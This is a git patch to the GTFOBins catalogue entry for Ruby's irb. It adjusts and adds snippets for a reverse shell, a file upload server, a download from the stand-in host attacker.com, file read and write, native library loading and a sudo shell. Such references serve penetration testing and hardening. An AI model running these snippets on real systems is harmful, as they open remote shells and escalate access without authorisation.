From 76f0b9cf458e9974ac5b746eb8c96e2d6022c38b Mon Sep 17 00:00:00 2001 From: Emilio Date: Thu, 3 Jan 2019 20:27:53 +0000 Subject: [PATCH] Adjust and add file-write, file-read, and library-load to irb --- _gtfobins/irb.md | 24 ++++++++++++++++++------ 1 file changed, 18 insertions(+), 6 deletions(-) diff --git a/_gtfobins/irb.md b/_gtfobins/irb.md index de622df..c3d91df 100644 --- a/_gtfobins/irb.md +++ b/_gtfobins/irb.md @@ -5,24 +5,36 @@ functions: irb exec '/bin/bash' reverse-shell: - - description: Run `nc -lvp RPORT` on the attacker box to receive the shell. + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST='127.0.0.1' export RPORT=9000 irb require 'socket'; exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read} end file-upload: - - description: Serve files in the local folder running an HTTP server on port 8080. + - description: Serve files in the local folder running an HTTP server on port 8888. code: | irb - require 'webrick'; WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start; + require 'webrick'; WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start; file-download: - - description: Fetch a remote file via an HTTP GET request and store it in `PWD`. + - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get - export FILE=file_to_save + export LFILE=file_to_save irb - require 'open-uri'; download = open(ENV['URL']); IO.copy_stream(download, ENV['FILE']) + require 'open-uri'; download = open(ENV['URL']); IO.copy_stream(download, ENV['LFILE']) + file-write: + - code: | + irb + File.open("file_to_write", "w+") { |f| f.write("DATA") } + file-read: + - code: | + irb + puts File.read("file_to_read") + library-load: + - code: | + irb + require "fiddle"; Fiddle.dlopen("lib.so") sudo: - code: | sudo irb